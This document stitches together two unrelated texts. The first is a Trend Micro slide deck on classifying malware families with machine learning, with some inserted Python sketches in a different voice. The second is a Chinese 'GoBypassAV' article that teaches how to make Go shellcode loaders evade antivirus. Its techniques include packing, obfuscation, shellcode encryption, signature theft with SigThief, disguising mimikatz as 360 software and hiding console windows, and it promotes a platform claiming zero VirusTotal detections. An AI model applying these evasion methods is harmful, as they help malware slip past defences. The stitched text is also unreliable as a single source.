Machine Learning Protect against tomorrow’s threats 基於機器學習的惡 意軟體分類實作:" Microsoft"Malware" Classification" Challenge"經驗談 Trend Micro ch0upi miaoski Kyle Chung 2 Dec 2016 Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats ch0upi • Staff"engineer"in"Trend"Micro • Machine"Learning"+"Data"Analysis • Threat"intelligence"services • KDDCup 2014"+"KDDCup 2016:"Top10 • GoTrend:"6th in"UEC"Cup"2015 Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats miaoski • Senior"threat"researcher"in"Trend"Micro • Threat"intelligence • Smart"City • SDR • Arduino"+"RPi makers • Loves"cats Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 4 Outline • Why"Malware"Classification? • Machine"Learning • Microsoft"Challenge • How"to"Solve"it? • Conclusion Machine Learning Protect against tomorrow’s threats MALWARE' CLASSIFICATION Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats What’s"Malware"Classification? • Identify"malware"family Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats Why"Malware"Classification? • Know"how"to"clean • Possible"attribution • Set"proper"priority Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats Current"Malware"Classification • Manually"generated"by"researchers • Use"signature"to"fingerprint"malware" • YARA"rules Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats Challenge • Manual"process"è wrong"family • more"and"more"malware"families • Very"large"volume • daily"1M+"samples • Increasing"signatures • Slow"in"scanning"+"need"more"storage Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats BSidesLV 2016:"VirusShare • John"Seymour,"Labeling"the"VirusShare Corpus:" Lessons"Learned,"BSidesLV 2016 • VirusShare Corpus:"~20M"files Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats Machine"Learning"for • Automation"of"malware"family"identification • Save"researcher’s"effort Machine Learning Protect against tomorrow’s threats MACHINE LEARNING Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 13 Machine"Learning"Steps • Prepare"Data • Generate"Feature • Train"Model • Make"Prediction • Evaluate Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 14 Fruit"Classification • Apple • Banana Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 15 Fruit"Features • Color • Shape • Size • Weight Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 16 Learning • Apple • Banana Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 17 Learned"Model"of"Fruit • Apple • Color:"Red • Shape:"Round • Banana • Color:"Yellow • Shape:"Long Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 18 New"Fruit"Coming… • Apple?"Banana? 
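The fruit slides above are the running example for the workflow that follows (features, train, predict); a minimal scikit-learn sketch of that toy problem, with made-up numeric encodings for the color and shape features, could look like this:

from sklearn.tree import DecisionTreeClassifier

# Made-up encoding: color 0 = red, 1 = yellow; shape 0 = round, 1 = long
X_train = [[0, 0], [0, 0], [1, 1], [1, 1]]      # two apples, two bananas
y_train = ["apple", "apple", "banana", "banana"]

clf = DecisionTreeClassifier()
clf.fit(X_train, y_train)
print(clf.predict([[0, 0]]))                    # a red, round fruit -> expected "apple"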
Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 19 Prediction"of"Fruits • Fruit"1 • Color:"Red"=>"Apple • Shape:"Round"=>"Apple • Fruit"2 • Color:"Yellow"=>"Banana • Shape:"Long"=>"Banana Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 20 Evaluation"of"Fruit • Accuracy:"(9+9)/20"="90% Apple Banana Apple 9 1 Banana 1 9 Total 10 10 Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 21 Machine"Learning"Steps • Prepare"Data • Generate"Feature • Train"Model • Make"Prediction • Evaluate Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 22 Machine"Learning"is"... • Mathematical"methods"and"algorithms • From"historical"labelled"data • Find"a"separating"hyperplane • Apply"it"on"future"data Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 23 Feature"is"... • Measurable"property"of"a"phenomenon"being" observed • Use"to"describe"entries • Feature"vector • input"of"machine"learning"algorithm • Source"of"features • data"exploring • domain"knowledge Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 24 Model"is"... • A"mathematical"description"of"how"to"classify"the" data • Parameters"tuned"by"certain"algorithm • training • Used"to"make"prediction Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 25 Prediction • Identify"the"class"of"new"entities • With"trained"model"from"training"data Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 26 Evaluation • Review"model"result"by"some"measurements • Cross"validation • Evaluation"functions • Accuracy • logloss • AUC • precision,"recall,"F1 Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 27 Glue"Language • Glue"the"steps"of"Machine"Learning"Learning • Batch"running"for"large"amount"of"data • Integration"with"Hadoop,"Spark • Rich"libraries/Algorithm"support • Easy"to"develop/learn Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 28 scikit learn • Open"source"machine"learning"library"for"python • Various"classification,"regression"and"clustering" algorithms • Interoperate"with"NumPy,"SciPy,"and"underlying" BLAS Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 29 scikit learn"cheat-sheet Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 30 Supported"Algorithm"in"scikit learn • Classification"Algorithm • Logistic"Regression:"linear_model.LogisticRegression() • SVM:"svm.SVC() • Random"Forest:"ensemble.RandomForestClassifier() • Interface • fit(X,"Y):"train"model • Yp=predict(X):"make"prediction Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 31 Evaluation"Functions"in"scikit learn • Evaluation"functions • metrics.accuracy_score() • metrics.log_loss() • metrics.auc() • metrics.f1_score() • metrics.confusion_matrix() • metrics.classification_report() Machine Learning Protect against tomorrow’s threats MICROSOFT'MALWARE' CLASSIFICATION'CHALLENGE Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 33 
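Putting the scikit-learn interface from the last few slides (fit(X, Y), Yp = predict(X), the metrics functions) into one runnable sketch — the data here is random placeholder data standing in for malware feature vectors, not the challenge set:

import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
from sklearn import metrics

rng = np.random.RandomState(0)
X = rng.rand(200, 10)                           # placeholder feature matrix
y = rng.randint(1, 10, size=200)                # labels 1..9, mirroring the 9 families

X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.3, random_state=0)

clf = RandomForestClassifier(n_estimators=100, random_state=0)
clf.fit(X_tr, y_tr)                             # train model
y_pred = clf.predict(X_te)                      # make prediction
y_proba = clf.predict_proba(X_te)               # class probabilities, needed for logloss

print(metrics.accuracy_score(y_te, y_pred))
print(metrics.log_loss(y_te, y_proba, labels=clf.classes_))
print(metrics.confusion_matrix(y_te, y_pred))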
Microsoft"Malware"Classification" Challenge • Hosted"by"WWW"2015"/"BIG"2015" • Microsoft"Malware"Protection"Center Microsoft"Azure"Machine"Learning Microsoft"Talent"Management • PE"Hexdump &"Disassembled • Training:"10,868"(compressed:"17.5GB) • Testing:"10,873"(compressed:"17.7GB) Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 34 9 Classes Category Count 1 Ramnit 1541 2 Lollipop 2478 3 Kelihos_ver3 2942 4 Vundo 475 5 Simda 42 6 Tracur 751 7 Kelihos_ver1 398 8 Obfuscator.ACY 1228 9 Gatak 1013 Total 10868 Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 35 Class:"Ramnit • Steal"sensitive"personal"information • Infected"through"removable"drivers • Copy"itself"using"a"hard-coded"name,"or"with"a" random"file"name"to"a"random"folder • Inject"codes"into"svchost.exe • Infects"DLL,"EXE,"HTML Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 36 Class:"Lollipop • An"adware"shows"ads"when"browsing"web • Bundle"with"third-party"software • Auto"run"when"Windows"starting Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 37 Class:"Kelihos • A"Trojan"family"distributes"spam"email"with" malware"download"link • Communicate"with"C&C"server • Some"variants"install"WinPcap to"spy"network" activity Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 38 PE"Hexdump w/o"Header Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 39 IDA"Pro"Dump Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 40 IDA"Pro"Dump Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 41 IDA"Pro"Dump Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 42 Evaluation"Function pij is the submitted probability of sample i is class j yij=1 if sample i is class j, yij=0 for others 𝑙𝑜𝑔𝑙𝑜𝑠𝑠 = − 1 𝑁 ) ) 𝑦𝑖𝑗-log-(𝑝𝑖𝑗) 4 567 8 967 Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 43 Evaluation"Example • Submission 00000000,0.5,0.5,0,0,0,0,0,0,0,0 00000001,0,0,0.5,0.5,0,0,0,0,0,0 00000002,0,0,1,0,0,0,0,0,0,0 • logloss ="- (log(0.5)+log(0)+log(1))/3 • log(0)"=>"log(1e-15) Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 44 Leader"Board • Public"vs."Private Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 45 Leader"Board Public Private Machine Learning Protect against tomorrow’s threats HOW'TO'SOLVE'IT? Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 47 First"Feature"Set • Binary"size • Hex"count • String"length"stats • TLSH Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 48 Binary"Size Category Avg. 
Size 1 Ramnit 1482170 2 Lollipop 5829530 3 Kelihos_ver3 8982630 4 Vundo 1120950 5 Simda 4552330 6 Tracur 1801150 7 Kelihos_ver1 5051900 8 Obfuscator.ACY 827118 9 Gatak 2555070 0 1000000 2000000 3000000 4000000 5000000 6000000 7000000 8000000 9000000 10000000 1 2 3 4 5 6 7 8 9 Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 49 Hex"Count • Count"of"HEX • 00,"01,"02,…,"FE,"FF,"?? • 257"dimensions • 1-gram Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 50 Hex"Count"Distribution 0009121b242d36 3f 48515a636c757e879099a2abb4bdc6 cf d8e1ea f3 fc 0009121b242d36 3f 48515a636c757e879099a2abb4bdc6 cf d8e1ea f3 fc 0009121b242d36 3f 48515a636c757e879099a2abb4bdc6 cf d8e1ea f3 fc 1. Ramnit 2. Lollipop 3. Kelihos_v3 Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 51 Hex"Count"Confusion"Matrix? Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 52 String"Stats • String:"printable"chars"where"length">"4 • String"count,"avg."length,"max"length 0 2000 4000 6000 8000 10000 12000 14000 1 2 3 4 5 6 7 8 9 0 2 4 6 8 10 12 14 16 18 20 1 2 3 4 5 6 7 8 9 Avg. Count Avg. length Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 53 TLSH • Trend"Micro"Locality"Sensitive"Hash • Fuzzy"matching"for"similarity"comparison • Get"the"most"similar"class"by"voting"of"Top5"similar" files"from"training"data Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 54 TLSH 0 500 1000 1500 2000 2500 3000 3500 1 2 3 4 5 6 7 8 9 Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 55 More"Features • HEX"n-gram • API"call • Import"table • Instruction • Domain"knowledge Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 56 2-gram/3-gram • 2-gram:"(256+1)^2="66,049 • 3-gram:"(256+1)^3="16,974,593 Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 57 HEX"2-gram/3-gram • Important"2-gram"Example • Feature"selection:"reduce"feature"size BiHEX 1. Ramnit 2. Lollipop 3. Kelihos_ver3 97 86 1.412 2.047 26.651 4b e5 1.718 0.722 13.201 f7 99 1.746 12.539 13.606 75 08 228.09 288.78 13.168 4e 47 146.318 12.159 13.512 Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 58 API"Call • API"used"in"PE API 1. Ramnit 2. Lollipop 3. Kelihos_ver3 IsWindow() 0.164 0.257 0.987 DispatchMessageA() 0.159 0.845 0.987 GetCommandLineA() 0.355 0.981 0.025 DllEntryPoint() 0.656 0 0 GetIconInfo() 0.023 0 0.936 Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 59 Import"Table • A"lookup"table"for"calling"functions"in"other"module 1. Ramnit 2. Lollipop 3. 
Kelihos_ver3 KERNEL32.dll KERNEL32.dll USER32.dll USER32.dll USER32.dll KERNEL32.dll ADVAPI32.dll ADVAPI32.dll MSASN1.dll ole32.dll OPENGL32.dll UXTHEME.dll OLEAUT32.dll OLEAUT32.dll CLBCATQ.dll msvcrt.dll GDI32.dll DPNET.dll APPHELP.dll WS2_32.dll NTSHRUI.dll Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 60 Other"Info"in"Import"Table • Number"of"distinct"DLL 0 1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 61 Instruction"Frequency • Very"powerful instruction 1. Ramnit 2. Lollipop 3. Kelihos_ver3 imul 86.768 2257.3 0.002 movzx 289.17 118.79 0 sbb 68.815 17.375 4.746 jnz 1154.8 154.57 7.842 mov 12336.6 7059.8 158.94 Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 62 More"Domain"Knowledge • Segment • Packer • Other"type"of"binary Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 63 Segments • Common"segment"name • Unique"segment"name 1. Ramnit 2. Lollipop 3. Kelihos_ver3 _data _text _rdata _text _data _text _rdata _rdata _data _bss _zenc _gnu_deb _tls Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 64 Other"Info"from"Segments • Number"of"Segments Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 65 Packer • Common"segment"name"of"Packer • UPX0/UPX1"only"in"class"8."Obfuscator.ACY Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 66 Other"Type"of"Binary • RAR"files" Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 67 Other"Type"of"Binary • Microsoft"Office"files" Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 68 Ensemble:"Linear"Blending • Combine"the"result"from"several"models • Vote"of"models Machine Learning Protect against tomorrow’s threats WORK'OF'WINNING'TEAM Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 70 Features • Instruction"n-gram • ASM"pixel"map http://blog.kaggle.com/2015/05/26/microsoft-malware-winners-interview-1st-place-no-to-overfitting/ Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 71 Features • ASM"pixel"map"(intensity"of"first"1000"bytes) Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 72 xgboost • Gradient"boosting"package • Widely"used"in"Kaggle"competition Machine Learning Protect against tomorrow’s threats CONCLUSION Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 74 Physical"Meaning"of"Features • Hex"n-gram • Opcode + imm/addr • Instruction"n-gram • Opcode Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 75 Happy"Ending? • Welcome"to"the"real"world! • New"malware"family • Mis-labelling • Mechanism"to"mitigate"the"issues. 
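The winning team's pipeline mentioned above feeds instruction n-grams and asm-pixel features into gradient boosting; a minimal multi-class sketch with the xgboost scikit-learn wrapper, scored with the same multi-class logloss the challenge used, on placeholder data:

import numpy as np
import xgboost as xgb
from sklearn.metrics import log_loss

rng = np.random.RandomState(1)
X = rng.rand(300, 50)                           # placeholder features (n-grams, pixel intensities, ...)
y = rng.randint(0, 9, size=300)                 # 9 families, 0-indexed as xgboost expects

model = xgb.XGBClassifier(objective="multi:softprob", n_estimators=200, max_depth=6, learning_rate=0.1)
model.fit(X, y)
proba = model.predict_proba(X)
print(log_loss(y, proba))                       # the competition's evaluation metric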
Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 76 Trend"Micro"XGen Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 77 Trend"Micro"ML"Contest • Malware"Identification"Challenge • 134"teams,"626"players,"from"6+"countries • Real-time"scoring Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 78 How"to"Improve"Model • Use"domain"knowledge • Unpack, unzip ... • Improve"feature"representation • Distinctive features for classes which you don’t do well • Regulate"overfitting Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 79 How"to"Improve"Model • Find"which"items"cannot"be"covered"by"model • Adjust"current"features • Find"new"features • Tuning"algorithm"parameters • Use"different"algorithm • Ensemble/Blending Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 80 Local"Library"vs."Cloud"Platform Cloud"platform"is"not"necessarily"easier • Glue"&"Integration • Data"(pre-)processing • Model"training"/"prediction • Evaluation • Diversity"of"ML"algorithms • Parameter"tuning Machine Learning Protect against tomorrow’s threats THANK'YOU
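As a wrap-up of the feature slides: the hex 1-gram and 2-gram counts are computed straight from the .bytes hexdump text, and the '??' placeholder for unreadable bytes is why the alphabet has 257 symbols rather than 256 (so 257^2 = 66,049 possible 2-grams, as stated earlier). A rough extraction sketch, assuming the dump format shown on the slides (an address column followed by byte tokens; the file name is hypothetical):

from collections import Counter
from itertools import islice

def hexdump_tokens(path):
    # Yield byte tokens ('00'..'FF' or '??'), skipping the leading address column.
    with open(path) as f:
        for line in f:
            yield from line.split()[1:]

def ngram_counts(tokens, n):
    toks = list(tokens)
    return Counter(" ".join(g) for g in zip(*(islice(toks, i, None) for i in range(n))))

# unigrams = ngram_counts(hexdump_tokens("sample.bytes"), 1)   # up to 257 distinct symbols
# bigrams  = ngram_counts(hexdump_tokens("sample.bytes"), 2)   # up to 257^2 distinct symbols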
pdf
GoBypassAV 整理理了了基于Go的16种API免杀测试、8种加密测试、反沙盒测试、编译混淆、加壳、资源修改等免 杀技术,并搜集汇总了了⼀一些资料料和⼯工具。 免杀专题⽂文章及⼯工具:https://github.com/TideSec/BypassAntiVirus 免杀专题在线⽂文库:http://wiki.tidesec.com/docs/bypassav 本⽂文涉及的所有代码和资料料:https://github.com/TideSec/GoBypassAV/ 0x01 基于Go的免杀 Go语⾔言是⾕谷歌2009发布的第⼆二款开源编程语⾔言,Go语⾔言专⻔门针对多处理理器器系统应⽤用程序的编程进 ⾏行行了了优化,使⽤用Go编译的程序可以媲美C或C++代码的速度,⽽而且更更加安全、⽀支持并⾏行行进程。 基于Go的各种免杀也就是使⽤用不不同的windows API为shellcode申请⼀一段内存,然后把指令寄存器器 指向shellcode的开头,让机器器执⾏行行这段shellcode。除此之外,再加上⼀一些其他⽅方式,也可以有效 的提⾼高免杀效果。 本⽂文就这些常⽤用免杀⽅方式进⾏行行总结汇总。 0x02 使⽤用不不同API 在本系列列上⼀一篇⽂文章 《76.远控免杀专题(76)-基于Go的各种API免杀测试》 中,已经对常⻅见的 16 种API免杀 效果进⾏行行了了测试,⼤大家可以浏览参考。 测试使⽤用的平台为VT平台: https://virustotal.com/ 0x03 反沙盒检测 在本系列列的第75篇⽂文章 《75.远控免杀专题(75)-基于Go的沙箱检测》 中,对常⻅见的8种沙盒检测 ⽅方式进⾏行行了了总结。 具体沙盒检测代码在这⾥里里: https://github.com/TideSec/GoBypassAV/tree/main/SandBox 测试结果为如下。 未使⽤用沙箱检测技术的,VT查杀结果为:10/71 使⽤用了了沙箱检测技术的,VT查杀结果为:8/70 这些都属于⽐比较常规、简单且已经公开的⽅方式,所以差别不不是很⼤大,沙盒基本都能反反检测了了。 0x04 Go编译对免杀的影响 在使⽤用Go进⾏行行免杀的时候, go build 的编译选项也对免杀效果有较⼤大影响。 在编译时,常⽤用的编译命令为 go build -ldflags="-s -w -H=windowsgui" 测试使⽤用的平台为VT平台: https://virustotal.com/ ,使⽤用的是专题76中的 HelloTide 代 码。 L. 直接使⽤用 go build ,VT免杀率7/70,免杀效果最好的,但⽂文件相对⽐比较⼤大,⼀一 个 helloworld 都能1.8M。 N. -ldflags="-s -w" 参数:VT免杀率7/70,主要是减⼩小⽂文件⼤大⼩小, helloworld 能缩减到 1.2M,没有增强免杀效果。 O. -ldflags="-H=windowsgui" 参数:VT免杀率13/70,主要是隐藏窗⼝口,但会降低免杀效 果,VT查杀增加4。 Q. -race 参数:VT免杀率20/70,在2021年年的时候这个参数效果很好,但现在已经不不能⽤用了了, 正常的 helloworld 加上这个参数后VT平台直接16个报病毒。 所以⽐比较推荐的编译命令为 go build -ldflags="-s -w" ,但是这样就会有⿊黑窗⼝口,后⾯面会说如 何解决⿊黑窗⼝口的隐藏问题。 0x05 加壳混淆 对程序进⾏行行加壳或者混淆也是常⽤用的免杀⽅方式,本系列列⽂文章之前也介绍过⼀一些加壳软件,⽐比如upx 加壳之类的,这⾥里里对⽐比⼀一下对Go程序进⾏行行UPX加壳的免杀效果。 还是使⽤用上⾯面 go build ,VT免杀率7/70的程序进⾏行行加壳对⽐比。 5.1 upx加壳 使⽤用最优加壳 upx --best 00-HelloTide.exe -o upx-hello.exe 加壳后⼤大⼩小从1.8M降为1.08M,但是VT免杀率降到了了13/70。 5.2 shielden加壳 使⽤用 safengine shielden 加壳2.4.0.0 软件进⾏行行加壳,加壳后⽂文件居然变⼤大到了了2.5M,VT免杀 率居然降到了了33/70,可以直接放弃这个了了。 5.3 VMProtect加壳 使⽤用 VMProtect Ultimate 3.4.0 进⾏行行加壳,加壳后⽂文件居然6.3M,VT免杀率居然降到了了 19/70。⽂文件那么⼤大,免杀效果也⼀一般,也可以放弃了了。 5.4 garble代码混淆 使⽤用 garble 可对Go程序进⾏行行编译混淆,起到⼀一定的免杀作⽤用。 项⽬目地 址: https://github.com/burrowers/garble 在项⽬目中直接使⽤用 garble.exe build ,即可编译,编译⽂文件变⼩小为1.2M。 额,结果略略尴尬。 使⽤用两个参数 garble.exe -literals -seed=random build ,再次测试,还是略略尴尬。 0x06 对shellcode加密 在免杀中对payload进⾏行行先解密,然后运⾏行行时再解密,从⽽而逃避杀软的静态检测算是⽐比较常⻅见⽽而有 效的⼀一种⽅方式,我这⾥里里搜集整理理了了9种常⻅见的Golang的加解密⽅方法。 6.1 异或xor加密 这个⽐比较简单,设置个⾃自⼰己的密钥就可以,在 潮影在线免杀平台:http://bypass.tidesec.com/ 中也使⽤用了了异或加密。 详细代码在这 ⾥里里: https://github.com/TideSec/GoBypassAV/tree/main/Encryption/XOR_code 6.2 Base64编码 GO内置了了base64的包,可直接调⽤用,也可对shellcode进⾏行行多轮的base64编码。 package main import ( "encoding/base64" "fmt" ) func main(){ var str = "tidesec" strbytes := []byte(str) encoded := base64.StdEncoding.EncodeToString(strbytes) fmt.Println(encoded) decoded, _ := base64.StdEncoding.DecodeString(encoded) decodestr := string(decoded) fmt.Println(decodestr) } 6.3 AES加密 ⾼高级加密标准(Advanced Encryption Standard,缩写:AES),是美国联邦政府采⽤用的⼀一种区块 加密标准。现在,⾼高级加密标准已然成为对称密钥加密中最流⾏行行的算法之⼀一。 AES实现的⽅方式有5种: 1.电码本模式(Electronic Codebook Book (ECB)) 2.密码分组链接模式(Cipher Block Chaining (CBC)) 3.计算器器模式(Counter (CTR)) 4.密码反馈模式(Cipher FeedBack (CFB)) 5.输出反馈模式(Output FeedBack (OFB)) 我这是采⽤用的是电码本模式Electronic Codebook Book (ECB)。 代码在这⾥里里: https://github.com/TideSec/GoBypassAV/tree/main/Encryption/AES_code 代码参考 http://liuqh.icu/2021/06/19/go/package/16-aes/ 6.4 RC4加密 6.5 B85加密 参考代码: https://github.com/darkwyrm/b85 6.6 ⼋八卦加密 代码参考: https://github.com/Arks7/Go_Bypass 6.7 三重DES、RSA加密 偶然发现了了⼀一个专⻔门的GO的加解密项⽬目,很全⾯面。 项⽬目地址: https://github.com/wumansgy/goEncrypt go语⾔言封装的各种对称加密和⾮非对称加密,可以直接使⽤用,包括3重DES,AES的CBC和CTR模 式,还有RSA⾮非对称加密。 我把源码打包放在了了这⾥里里 
https://github.com/TideSec/GoBypassAV/tree/main/Encryption/goEncrypt 6.8 ShellcodeUtils ⼀一个专⻔门针对shellcode进⾏行行加解密的脚本,可以实现XOR、AES256、RC4的加解密。 https://github.com/TideSec/GoBypassAV/tree/main/Encryption/ShellcodeUtils 0x07 资源修改 资源修改主要是修改图标、增加签名之类的。 从⽹网上找到了了⼀一个Go语⾔言的伪造签名的代码,Go版和Python版的代码在这⾥里里 https://github.com/TideSec/GoBypassAV/tree/main/SignThief 。 其他资源修改之前的⽂文章也都有介绍**《68.远控免杀专题(68)-Mimikatz免杀实践(上)》**。 该案例例是对mimikatz可执⾏行行程序的免杀测试,我这直接摘过来了了。 需要⼏几个软件,VMProtect Ultimate 3.4.0加壳软件,下载链接: https://pan.baidu.com/s/1VXaZgZ1YlVQW9P3B_ciChg 提取码: emnq 签名软件 https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/ sigthief.py 资源替换软件 ResHacker: https://github.com/TideSec/BypassAntiVirus/blob/master/tools/mimikatz /ResHacker.zip 先替换资源,使⽤用ResHacker打开mimikatz.exe,然后在图标⾥里里替换为360图标,version⾥里里⾯面⽂文字 ⾃自⼰己随意更更改。 这⾥里里先介绍⼀一种⽐比较常⻅见的pe免杀⽅方法,就是替换资源+加壳+签名,有能⼒力力的还可以pe修改,⽽而且mimikatz是开源 安装vmp加壳软件后,使⽤用vmp进⾏行行加壳 使⽤用 sigthief.py 对上⼀一步⽣生成的exe⽂文件进⾏行行签名。sigthief的详细⽤用法可以参 考 https://github.com/secretsquirrel/SigThief 。 然后看看能不不能运⾏行行,360和⽕火绒都没问题。 VT平台上 mimikatz32_360.exe ⽂文件查杀率9/70,缺点就是vmp加壳后会变得⽐比较⼤大。 0x08 架构的影响 编译⽣生成的程序如果x86或x64架构不不同,那么对免杀的影响也很⼤大,整理理来说x64程序免杀更更好⼀一 些。 我以专题76中提到的 08-EarlyBird 为例例进⾏行行测试,正常x64免杀为7/70。 编译x86架构的程序,VT免杀为21/70,差的还是⽐比较⼤大的。 0x09 隐藏窗⼝口 常规的隐藏窗⼝口⼀一般都是使⽤用 -H=windowsgui 参数,但这样会增⼤大杀软查杀的概率。 我这提供两种隐藏窗⼝口的代码。 完整代码在这⾥里里 https://github.com/TideSec/GoBypassAV/tree/main/HideWindow package main import "github.com/gonutz/ide/w32" func ShowConsoleAsync(commandShow uintptr) { console := w32.GetConsoleWindow() if console != 0 { _, consoleProcID := w32.GetWindowThreadProcessId(console) if w32.GetCurrentProcessId() == consoleProcID { w32.ShowWindowAsync(console, commandShow) } } } func main() { ShowConsoleAsync(w32.SW_HIDE) } 另外⼀一种,相⽐比第⼀一种,⽣生成的⽂文件略略⼤大⼀一点。 package main import "github.com/lxn/win" func main(){ win.ShowWindow(win.GetConsoleWindow(), win.SW_HIDE) } 0x10 ⼩小结 综上,做Go的免杀时,要注意下⾯面⼏几点。 1. API的选择⽐比较关键。 2. 选择合适的加密⽅方式来处理理shellcode 3. 尽量量⽣生成x64的shellcode,⽣生 成x64位程序 4. 编译时建议使⽤用 go build -ldflags="-s -w" go build -ldflags="-s -w" ,也可以使⽤用 garble garble 5. 加 壳的话可以使⽤用upx,其他如果有更更好的也可以使⽤用 6. 修改资源、加签名有⼀一定效果 7. 好的反沙 盒技巧还是很有效的 8. 隐藏窗⼝口不不要使⽤用 -H=windowsgui -H=windowsgui 参数 9. 使⽤用分配虚假内存等⽅方式可绕 过部分杀软 10. 采⽤用正常功能进⾏行行混淆,可增强免杀效果,但⽂文件可能变⼤大很多 0x11 Go免杀实践 通过对Go免杀的研究,实现了了⼀一个在线免杀平,主要⽤用于杀软技术研究和样本分析。同时也⽅方便便 有免杀需求,但没时间和精⼒力力去研究免杀的⼩小伙伴。 潮影在线免杀平台:http://bypass.tidesec.com/ 平台上使⽤用了了基于Go的7种API,并结合使⽤用了了上⾯面的shellcode加密、沙盒检测、⾏行行为混淆、随机 函数等⽅方式后,可实现VT平台查杀率3/70。⽽而在使⽤用了了shellcode分离后,⽬目前可实现VT平台0查 杀。 选择“URL加载”-“是”,⽣生成的TideAv_Go_XXXX_img.exe可以做到VT全免杀,⽀支持本地⽂文件加载 和⽹网络加载,图⽚片内置隐写的shellcode。 另外,⽬目前还添加了了两种基于Python的免杀⽅方式,⼀一种是基于RSA加密,⼀一种是基于pickle反序列列 化。使⽤用pyinstaller打包,经过⼀一些bypass处理理,⽬目前也可以接近VT平台0查杀。具体Python免杀 的实现后续⽂文章会介绍。 0x11 参考资料料 本⽂文内容参考节选⾃自以下资料料: go-shellcode项⽬目: https://github.com/Ne0nd0g/go-shellcode safe6Sec⼤大佬: https://github.com/safe6Sec/GolangBypassAV 